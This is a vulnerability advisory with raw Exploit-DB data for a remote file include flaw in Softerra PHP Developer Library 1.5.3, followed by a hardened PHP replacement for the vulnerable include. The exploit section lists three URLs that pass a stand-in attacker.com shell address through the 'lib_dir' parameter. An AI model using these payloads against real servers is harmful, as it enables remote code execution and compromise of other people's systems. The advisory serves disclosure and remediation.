Vendor: PHP Developer Library
By: MP
CVSS: 7.5 (HIGH)
Title: Remote File Include Vulnerability
CWE: 98
Product Name: PHP Developer Library
Affected Version From: 1.5.3
Affected Version To: 1.5.3
Patch Exists: No
Related CWE: N/A
CPE: a:softerra:php_developer_library
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Published: 2006

Softerra. PHP Developer Library

A remote file include vulnerability exists in Softerra. PHP Developer Library. The vulnerability is caused by the 'lib_dir' parameter in the 'registry.lib.php', 'sqlcompose.lib.php' and 'sqlsearch.lib.php' scripts not being properly sanitized before it is used to build an include path. This can be exploited to include arbitrary files from remote locations, e.g. by passing a URL in the 'lib_dir' parameter. Successful exploitation requires that 'allow_url_include' is set to 'on' in php.ini.

Mitigation:

Disable the 'allow_url_include' directive in the php.ini configuration file.
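A hardened replacement for the `require_once ($lib_dir . "...")` pattern quoted in the advisory, added here as an example (it is not code from the library or from the advisory author). The `LIB_BASE` path and the `safe_lib_dir()` helper are assumptions; `sqlstorage.class.php` is the file named in the advisory's quoted code.

```php
<?php
// Added example, not part of the Softerra. PHP Developer Library.
// Replaces the unsanitized include with one that only accepts a directory
// under the library's own install path and never a URL or stream wrapper.
declare(strict_types=1);

const LIB_BASE = __DIR__ . '/lib';   // assumed location of the library files

/**
 * Validate $lib_dir: it must resolve to LIB_BASE or a directory inside it.
 * Returns the canonical path with a trailing separator, or null if rejected.
 */
function safe_lib_dir(string $lib_dir): ?string
{
    // Reject anything with a scheme prefix (http://, ftp://, php://, data:, ...)
    if (preg_match('#^[a-z][a-z0-9+.-]*:#i', $lib_dir)) {
        return null;
    }
    $base     = realpath(LIB_BASE);
    $resolved = realpath(LIB_BASE . '/' . $lib_dir);
    if ($base === false || $resolved === false || !is_dir($resolved)) {
        return null;
    }
    // Canonical path must be LIB_BASE itself or a descendant (blocks ../ traversal)
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($resolved !== $base && strncmp($resolved, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $resolved . DIRECTORY_SEPARATOR;
}

// Vulnerable pattern from the advisory, with $lib_dir controlled by the request:
//   require_once ($lib_dir . "sqlstorage.class.php");

// Hardened equivalent: read the parameter explicitly, validate, then include.
$requested = (string) ($_GET['lib_dir'] ?? '');   // e.g. "" or "sql"
$dir = safe_lib_dir($requested);
if ($dir === null) {
    http_response_code(400);
    exit('invalid lib_dir');
}
require_once $dir . 'sqlstorage.class.php';

// Defence in depth: log if the directive named in the advisory is still enabled.
if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
    error_log('allow_url_include is enabled; remote includes remain possible');
}
```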

Exploit-DB raw data:

#################################################################
#                                                               #
#           [ Softerra. PHP Developer Library ]                 #
#                                                               #
# Class:     Remote File Include Vulnerability                  #
# Patch:     Unavailable                                        #
# Published: 2006/10/12                                         #
# Remote:    Yes                                                #
# Local:     No                                                 #
# Type:      High                                               #
# Site:      http://www.softerra.com/products_php-library.htm   #
# Author:    MP                                                 #
# Contact:   mp01010@yahoo.com                                  #
#                                                               #
#################################################################

Exploit:

http://softerraphpdeveloper.com/PHPLibrary-1.5.3/lib/registry.lib.php?lib_dir=http://attacker.com/shell?
http://softerraphpdeveloper.com/PHPLibrary-1.5.3/lib/sqlcompose.lib.php?lib_dir=http://attacker.com/shell?
http://softerraphpdeveloper.com/PHPLibrary-1.5.3/lib/sqlsearch.lib.php?lib_dir=http://attacker.com/shell?


Vuln Files:

registry.lib.php
sqlcompose.lib.php
sqlsearch.lib.php


Vuln Code:
#
../lib/registry.lib.php

<? ...
require_once ($lib_dir . "sqlstorage.class.php");
... ?>
##
../lib/sqlcompose.lib.php

<? ...
require_once ($lib_dir . "array.lib.php");
... ?>

##
../lib/sqlsearch.lib.php

<? ...
require_once ($lib_dir . "array.lib.php");
... ?>

# milw0rm.com [2006-10-12]